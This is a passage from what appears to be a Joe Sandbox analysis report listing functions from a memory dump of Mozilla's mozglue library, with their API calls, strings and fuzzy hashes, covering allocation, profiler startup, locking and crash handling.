Instruction ID: fa9019ae94530c368e15ab28f76c0ca6e05641a3aa38c6ac439540feb09e902e
Opcode Fuzzy Hash: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction Fuzzy Hash: 8C41F0716087019FC701CF29C8809ABB7E4BF8A344F608A5DF56687640DBB1E935CB85

Function 6C661530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C66159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615BC
moz_xmalloc.MOZGLUE(-00000001,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615E7
free.MOZGLUE(?,?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661637

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction ID: d01c86a85d46c23a7c691215a81a34074b03034866677b6b18a6f6f243d40b0c
Opcode Fuzzy Hash: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction Fuzzy Hash: 9C31EAB1A001149BCB148E7DD8514AEB7A5FB823647240B2DE423DBFD4EB30D915879B

Function 6C6BAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAD9D

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE3D

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction ID: 4eb5dd445afc357e947c968c0e77c1b944aa70b059dce956206679de5e0986f5
Opcode Fuzzy Hash: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction Fuzzy Hash: FB3164B1A002159FDB10DF7A8C44AABB7F8EF49714F15482DE94AE7700E734E815CBA9

Function 6C6B5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C6CDCA0,?,?,?,6C68E8B5,00000000), ref: 6C6B5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C68E8B5,00000000), ref: 6C6B5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C68E8B5,00000000), ref: 6C6B5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C68E8B5,00000000), ref: 6C6B5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C68E8B5,00000000), ref: 6C6B5FD6

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: f8ffd130b540d1622dd6cad74810715579423eb43e2eccc40f7330cdc55ac1c6
Instruction ID: f2c025b6eb9ea565baa2df8d15f82c6db1a81c960568f649629a87da775a8372
Opcode Fuzzy Hash: f8ffd130b540d1622dd6cad74810715579423eb43e2eccc40f7330cdc55ac1c6
Instruction Fuzzy Hash: C23106343006008FD711CF2AC898A6AB7FABF89319F648558E5569BB96CB31EC51CF84

Function 6C65B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C65B532
moz_xmalloc.MOZGLUE(?), ref: 6C65B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C65B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C65B57E
free.MOZGLUE(00000000), ref: 6C65B58F

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction ID: 89d8c58b405f94ff87142cdd8ce363126df9faeab29231e2da6d786d2f4b5cda
Opcode Fuzzy Hash: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction Fuzzy Hash: 3D212971A002059BDB00CF69CC80BAEBBB9FF86304F784129E918DB345E736D921C7A5

Function 6C6B6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6B6E78

Part of subcall function 6C6B6A10: InitializeCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6A68
Part of subcall function 6C6B6A10: GetCurrentProcess.KERNEL32 ref: 6C6B6A7D
Part of subcall function 6C6B6A10: GetCurrentProcess.KERNEL32 ref: 6C6B6AA1
Part of subcall function 6C6B6A10: EnterCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6AAE
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6B6AE1
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6B6B15
Part of subcall function 6C6B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C6B6B65
Part of subcall function 6C6B6A10: LeaveCriticalSection.KERNEL32(6C6DF618,?,?), ref: 6C6B6B83

MozFormatCodeAddress.MOZGLUE ref: 6C6B6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6B6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6B6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C6B6EFF

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 52868295192b0fefc6acc7cb5db6232ecb037373e40537bb9ebe56d2a2dce9ae
Instruction ID: 7a861fe4b3ce47c9d7d0582b0418f171e1b28da3ad38869fc556fbcb7c811e64
Opcode Fuzzy Hash: 52868295192b0fefc6acc7cb5db6232ecb037373e40537bb9ebe56d2a2dce9ae
Instruction Fuzzy Hash: 9F21A471A042199FDF04CF69D8C569E77F9EF89308F044039E809A7241DB70AA59CF96

Function 6C690D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C653DEF), ref: 6C690D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C653DEF), ref: 6C690D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C653DEF), ref: 6C690DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C690D97, 6C690DBE
<jemalloc>, xrefs: 6C690D92, 6C690DB9

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction ID: 9eb333f3b368d62e8b1546ca32396374ec09f74a64d74f8d664fc73b983ace28
Opcode Fuzzy Hash: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction Fuzzy Hash: C2F02E3138039623E72016670C0AF6A269EA7C6B35F314035F744DE9C4DA90F80486AE

Function 6C6A7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6A75C4,?), ref: 6C6A762B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7644
GetCurrentThreadId.KERNEL32 ref: 6C6A765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6A74D7,6C6B15FC,?,?,?), ref: 6C6A7677

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: ee541756ce323456bcc3d6523245fd4db53dfe164a67086f434006cbe362bdc5
Instruction ID: 6bb646a485ea3ebe2f0a811155d3322491c280c443d3c73ed9b1370723d7e4e5
Opcode Fuzzy Hash: ee541756ce323456bcc3d6523245fd4db53dfe164a67086f434006cbe362bdc5
Instruction Fuzzy Hash: 30F0A471E10786ABD7008F22C888675B778FFEA259F11431AF90543601E7B0B5D18BD5

Function 6C67D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751

Strings

MOZ_CRASH(), xrefs: 6C67D4BB

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction ID: 72be7f876658cff6d62bdf5daf5ff4cfa071adc8b61d5b6b6fcdee3ae64f8576
Opcode Fuzzy Hash: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction Fuzzy Hash: E651A071A047018FD364CF29C49465AB7F1EF89704F558E2ED59AC7B84D770E840CB6A

Function 6C6A4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6A4721

Strings

profiler-paused, xrefs: 6C6A46E4
., xrefs: 6C6A476A
-%llu, xrefs: 6C6A4733

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 7c47c857322daacc010ec0f4dd803b779c30a42292451004a68c6c0cc5d1a5bb
Instruction ID: d9b877f844518185a66eb8317f8e241a0f0eb0060e8744db4597b5dc4e61bef9
Opcode Fuzzy Hash: 7c47c857322daacc010ec0f4dd803b779c30a42292451004a68c6c0cc5d1a5bb
Instruction Fuzzy Hash: 37418971E047089BCB08CFB9D88116EBBF5EF86744F10863DE85957B41EB70E841874A

Function 6C6A46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6A4721

Part of subcall function 6C654410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C693EBD,00000017,?,00000000,?,6C693EBD,?,?,6C6542D2), ref: 6C654444

Strings

profiler-paused, xrefs: 6C6A46E4
., xrefs: 6C6A476A
-%llu, xrefs: 6C6A4733

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 26b888f47b694df7ae51fe5d885ae943c1e72917b37d5a576de09379f6fa01ae
Instruction ID: ee623ee0f79995db137349a269ed70c0a4b22cc15c8904805aa0d65b05339753
Opcode Fuzzy Hash: 26b888f47b694df7ae51fe5d885ae943c1e72917b37d5a576de09379f6fa01ae
Instruction Fuzzy Hash: 49312A71F042085BCB08CFADDC812ADBBE6DB89314F55813DE8059BB41EBB0DD058B99

Function 6C6AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C654290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C693EBD,6C693EBD,00000000), ref: 6C6542A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6AB127), ref: 6C6AB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6AB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6AB4E4

Strings

pid:, xrefs: 6C6AB4DE

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction ID: 08c90ab0690d7f8403227b0f2834ab55f99ceeb46082f2b9e9c56eb2096e64bc
Opcode Fuzzy Hash: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction Fuzzy Hash: E431E031A0120C9FDB00DFEAD880AEEB7B5FF85318F540529D81267A45D732AD46CBA9

Function 6C69E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C69E577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E584
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C69E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C69E826, 6C69E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C69E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C69E722, 6C69E750, 6C69E7A2
MOZ_PROFILER_STARTUP, xrefs: 6C69E5A1, 6C69E5CC, 6C69E5FF, 6C69E62A
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C69E777

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction ID: 8c3d27a3f7cef48c4ed5c2157a3c3fed9863bba23175123dc71420e2c82529b7
Opcode Fuzzy Hash: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction Fuzzy Hash: 4111AD31A04258DFCB009F16C888B6ABBB4FFC9329F050A19E84587651D774B805CFDE

Function 6C6A0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0CD5

Part of subcall function 6C68F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C68F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0D40
free.MOZGLUE ref: 6C6A0DCB

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

free.MOZGLUE ref: 6C6A0DDD
free.MOZGLUE ref: 6C6A0DF2

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction ID: 0744bd5b5f7c2c126cec454ca987b28fa44c9ec751ffde8c5b25c6819782081d
Opcode Fuzzy Hash: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction Fuzzy Hash: 154139719087809BD320DF29C08079AFBE5BFC9714F118A2EE9D987750D770A846CB9B

Function 6C6ACCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDA4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD158
Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDC4

Part of subcall function 6C6A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6B15FC,?,?,?,?,6C6B15FC,?), ref: 6C6A74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACECC

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

Part of subcall function 6C69CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6ACEEA,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000), ref: 6C69CB57
Part of subcall function 6C69CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C69CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6ACEEA,?,?), ref: 6C69CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD058

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction ID: 7f1d13926e85e4132c53c4f335a1232c33e1e35778ffcb01c90bc5c865becd05
Opcode Fuzzy Hash: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction Fuzzy Hash: 2FD16F71A04B469FD708CF28C480B99F7E1BF89308F01866DD95987712EB31B9A6CBC5

Function 6C675C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C675D40
